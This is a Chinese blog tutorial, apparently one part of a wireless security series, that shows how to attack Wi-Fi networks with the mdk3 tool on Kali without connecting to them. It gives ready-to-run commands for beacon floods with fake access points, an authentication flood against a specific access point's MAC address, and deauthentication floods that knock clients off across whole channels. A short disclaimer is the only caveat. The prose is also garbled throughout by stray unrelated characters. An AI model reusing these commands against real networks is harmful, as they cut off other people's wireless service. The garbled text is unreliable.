中秋節(jié)玩的比較嗨诵闭,無線安全專題的文章就拖沓了一下炼团,見諒見諒。疏尿。瘟芝。上篇講解了無線安全專題_破解篇03--打造個人字典,有感興趣的朋友給我私信褥琐,還有在公眾號中給我留言說锌俱,希望我講解一下彩虹表和GPU破解的事情,所以我為了響應大家的需求敌呈,我之后會在破解篇中再增加一篇專門講解彩虹表和GPU破解的問題贸宏。今天咱們就開啟無線安全專題下一篇:攻擊篇造寝。攻擊篇主要分為兩個部分:一個是不連接上無線下的攻擊,一個是連接上無線下的攻擊吭练。本次講解的就是如何在不連接無線的情況下進行攻擊(僅僅是討論技術(shù)诫龙,切不要進行惡意使用),主要使用的工具是kali下面的mdk3鲫咽。
一.偽造大量的死亡AP信號签赃,干擾通信
首先咱們將無線網(wǎng)卡切換到監(jiān)聽模式(怎么切換的,請看我之前寫的文章)分尸,偽造大量的AP信號使用的是mdk3的b參數(shù)锦聊。
b - Beacon Flood Mode
Sends beacon frames to show fake APs at clients.
This can sometimes crash network scanners and even drivers!
OPTIONS:
-n Use SSID instead of randomly generated ones 給AP信號指定名稱,不使用就隨機生成
-f Read SSIDs from file 可以從文件中讀取AP名稱
-v Read MACs and SSIDs from file. See example file!? 可以從文件中讀取ap mac和名稱
-dShow station as Ad-Hoc? 自定義為Ad-Hoc模式
-wSet WEP bit (Generates encrypted networks) 自定義為wep加密
-gShow station as 54 Mbit自定義為54M模式
-tShow station using WPA TKIP encryption自定義為wpaTKIP加密
-aShow station using WPA AES encryption自定義為wpaAES加密
-mUse valid accesspoint MAC from OUI database? 讀取數(shù)據(jù)庫中的mac
-hHop to channel where AP is spoofed。This makes the test more effective against some devices/drivers寓落。But it reduces packet rate due to channel hopping.
-c Fake an AP on channel . If you want your card to hop onl, this channel, you have to set -h option, too! 自定義信道
-s Set speed in packets per second (Default: 50) 自定義發(fā)包速率
1.1 偽造一個名稱為為qiye1括丁,信道為1荞下,發(fā)包速率為200的AP信號
mdk3 wlan1 b -n qiye1 -c 1 -p 200
1.2 偽造一個名稱為為qiye1伶选,信道為1,發(fā)包速率為200尖昏,加密方式為wpa AES的AP信號
mdk3 wlan1 b -n qiye1 -c 1 -p 200 -a
從手機上可以看到qiye1這個信號是加密的仰税。
1.3 根據(jù)文件中的名稱偽造AP信號,信道為2抽诉。
mdk3 wlan1 b -f FakeAPName.txt -c 2
執(zhí)行完成后陨簇,在電腦上可以看到下圖的效果,顯示了我自定義文件中的AP名稱:
1.4 隨機偽造大量ap信號,信道為1
mdk3 wlan1 b -g -c 1
電腦上會顯示各種亂七八糟命名的無線信號迹淌,填滿整個無線列表河绽。
二.驗證洪水攻擊方式,干擾通信唉窃,甚至可以干掉無線路由耙饰。
mdk3自動模擬隨機產(chǎn)生的mac向目標AP發(fā)起大量驗證請求,可以導致AP忙于處理過多的請求而停止對正常連接客戶端的響應纹份,這個可以用來強迫用戶重啟路由苟跪。
a - Authentication DoS mode
Sends authentication frames to all APs found in range.
Too much clients freeze or reset almost every AP.
OPTIONS:
-a Only test the specified AP? 攻擊目標AP的mac,可以看之前的欺騙篇蔓涧,可以知道怎么回去ap? mac
-m Use valid client MAC from OUI database 使用數(shù)據(jù)庫中mac
-c Do NOT check for test being successful 不檢測測試是否成功
-i Perform intelligent test on AP (-a and -c will be ignored) 智能測試This test connects clients to the AP and reinjects sniffed data to keep them alive
-s Set speed in packets per second (Default: unlimited) 發(fā)包速率
攻擊名稱為qiye件已,mac地址為FC:D7:33:DE:F3:8A的無線AP。
mdk3 wlan1 a -a FC:D7:33:DE:F3:8A -c? -s 300
發(fā)起攻擊后元暴,一直處于連接狀態(tài)篷扩,直到超時。手機也是這種情況茉盏,點擊連接后沒有什么反應瞻惋。
三.強制解除驗證洪水攻擊方式厦滤。
在這種模式下,軟件會想周圍所有的AP發(fā)送強制解除驗證數(shù)據(jù)包歼狼,迫使所有連接上AP的客戶端掉線掏导,無響應。
d - Deauthentication / Disassociation Amok Mode
Kicks everybody found from AP
OPTIONS:
-w Read file containing MACs not to care about (Whitelist mode) 指定白名單mac
-b Read file containing MACs to run test on (Blacklist Mode) 指定mac黑名單
-s Set speed in packets per second (Default: unlimited) 發(fā)包速率
-c [chan,chan,chan,...] Enable channel hopping. Without providing any channels, mdk3 will hop an all 14 b/g channels. Channel will be changed every 5 seconds.指定信道羽峰,可以用逗號分隔多個信道
3.1 攻擊名稱為qiye趟咆,mac地址為FC:D7:33:DE:F3:8A的無線AP,使我客戶端掉線無法上網(wǎng)。
mdk3 wlan1 d -b blacklist.txt
電腦掉線之后重新連接梅屉,發(fā)現(xiàn)已經(jīng)連不上了值纱。
3.2 直接按照信道進行全范圍攻擊
直接將我掃描到的所有信道進行攻擊。
mdk3 wlan1 d? -c 6,11,4,3,13,7
今天的分享就到這里坯汤,下一篇繼續(xù)分析虐唠。如果大家覺得還可以呀,記得推薦呦惰聂。
文/qiye(簡書作者)
原文鏈接:http://www.reibang.com/p/90e3dda99ade
著作權(quán)歸作者所有疆偿,轉(zhuǎn)載請聯(lián)系作者獲得授權(quán),并標注“簡書作者”搓幌。